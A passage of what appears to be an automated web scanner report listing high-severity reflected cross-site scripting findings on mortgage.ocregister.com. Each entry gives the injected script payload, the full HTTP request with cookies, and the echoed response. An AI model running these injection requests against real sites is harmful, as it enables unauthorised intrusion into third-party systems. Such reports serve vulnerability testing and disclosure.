The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc50"><script>alert(1)</script>ec9310bc127 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fc50\"><script>alert(1)</script>ec9310bc127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/01/?6fc50"><script>alert(1)</script>ec9310bc127=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/01/?6fc50\"><script>alert(1)</script>ec9310bc127=1feed/" />
...[SNIP]...

1.321. http://mortgage.ocregister.com/2010/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/02/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 712e3"><script>alert(1)</script>9e5b2bfe9ed was submitted in the REST URL parameter 1. This input was echoed as 712e3\"><script>alert(1)</script>9e5b2bfe9ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010712e3"><script>alert(1)</script>9e5b2bfe9ed/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010712e3\"><script>alert(1)</script>9e5b2bfe9ed/02/feed/" />
...[SNIP]...

1.322. http://mortgage.ocregister.com/2010/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b385"><script>alert(1)</script>122a8b5d193 was submitted in the REST URL parameter 2. This input was echoed as 7b385\"><script>alert(1)</script>122a8b5d193 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/027b385"><script>alert(1)</script>122a8b5d193/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/027b385\"><script>alert(1)</script>122a8b5d193/feed/" />
...[SNIP]...

1.323. http://mortgage.ocregister.com/2010/02/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6efb2"><script>alert(1)</script>1b95ace2821 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6efb2\"><script>alert(1)</script>1b95ace2821 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/02/?6efb2"><script>alert(1)</script>1b95ace2821=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/02/?6efb2\"><script>alert(1)</script>1b95ace2821=1feed/" />
...[SNIP]...

1.324. http://mortgage.ocregister.com/2010/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/03/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2292"><script>alert(1)</script>bcdb1fec87 was submitted in the REST URL parameter 1. This input was echoed as f2292\"><script>alert(1)</script>bcdb1fec87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010f2292"><script>alert(1)</script>bcdb1fec87/03/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010f2292\"><script>alert(1)</script>bcdb1fec87/03/feed/" />
...[SNIP]...

1.325. http://mortgage.ocregister.com/2010/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/03/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310bd"><script>alert(1)</script>7a47a846288 was submitted in the REST URL parameter 2. This input was echoed as 310bd\"><script>alert(1)</script>7a47a846288 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/03310bd"><script>alert(1)</script>7a47a846288/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/03310bd\"><script>alert(1)</script>7a47a846288/feed/" />
...[SNIP]...

1.326. http://mortgage.ocregister.com/2010/03/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/03/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6768b"><script>alert(1)</script>54bb9743afd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6768b\"><script>alert(1)</script>54bb9743afd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/03/?6768b"><script>alert(1)</script>54bb9743afd=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/03/?6768b\"><script>alert(1)</script>54bb9743afd=1feed/" />
...[SNIP]...

1.327. http://mortgage.ocregister.com/2010/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/04/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ca09"><script>alert(1)</script>d2b6ccdfeec was submitted in the REST URL parameter 1. This input was echoed as 4ca09\"><script>alert(1)</script>d2b6ccdfeec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20104ca09"><script>alert(1)</script>d2b6ccdfeec/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20104ca09\"><script>alert(1)</script>d2b6ccdfeec/04/feed/" />
...[SNIP]...

1.328. http://mortgage.ocregister.com/2010/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/04/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7ae"><script>alert(1)</script>1e9af29e281 was submitted in the REST URL parameter 2. This input was echoed as 2e7ae\"><script>alert(1)</script>1e9af29e281 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/042e7ae"><script>alert(1)</script>1e9af29e281/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/042e7ae\"><script>alert(1)</script>1e9af29e281/feed/" />
...[SNIP]...

1.329. http://mortgage.ocregister.com/2010/04/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/04/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 554c6"><script>alert(1)</script>0a80980ac2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 554c6\"><script>alert(1)</script>0a80980ac2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/04/?554c6"><script>alert(1)</script>0a80980ac2b=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/04/?554c6\"><script>alert(1)</script>0a80980ac2b=1feed/" />
...[SNIP]...

1.330. http://mortgage.ocregister.com/2010/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/05/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7b94"><script>alert(1)</script>a62b666be76 was submitted in the REST URL parameter 1. This input was echoed as e7b94\"><script>alert(1)</script>a62b666be76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010e7b94"><script>alert(1)</script>a62b666be76/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010e7b94\"><script>alert(1)</script>a62b666be76/05/feed/" />
...[SNIP]...

1.331. http://mortgage.ocregister.com/2010/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/05/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bedbd"><script>alert(1)</script>11ff887daaf was submitted in the REST URL parameter 2. This input was echoed as bedbd\"><script>alert(1)</script>11ff887daaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/05bedbd"><script>alert(1)</script>11ff887daaf/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/05bedbd\"><script>alert(1)</script>11ff887daaf/feed/" />
...[SNIP]...

1.332. http://mortgage.ocregister.com/2010/05/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/05/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f28"><script>alert(1)</script>8593dcd5118 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0f28\"><script>alert(1)</script>8593dcd5118 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/05/?b0f28"><script>alert(1)</script>8593dcd5118=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/05/?b0f28\"><script>alert(1)</script>8593dcd5118=1feed/" />
...[SNIP]...

1.333. http://mortgage.ocregister.com/2010/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/06/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a080d"><script>alert(1)</script>c86de3d6ec3 was submitted in the REST URL parameter 1. This input was echoed as a080d\"><script>alert(1)</script>c86de3d6ec3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010a080d"><script>alert(1)</script>c86de3d6ec3/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010a080d\"><script>alert(1)</script>c86de3d6ec3/06/feed/" />
...[SNIP]...

1.334. http://mortgage.ocregister.com/2010/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/06/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23a00"><script>alert(1)</script>ebbc17fb5f6 was submitted in the REST URL parameter 2. This input was echoed as 23a00\"><script>alert(1)</script>ebbc17fb5f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/0623a00"><script>alert(1)</script>ebbc17fb5f6/ HTTP/1.1
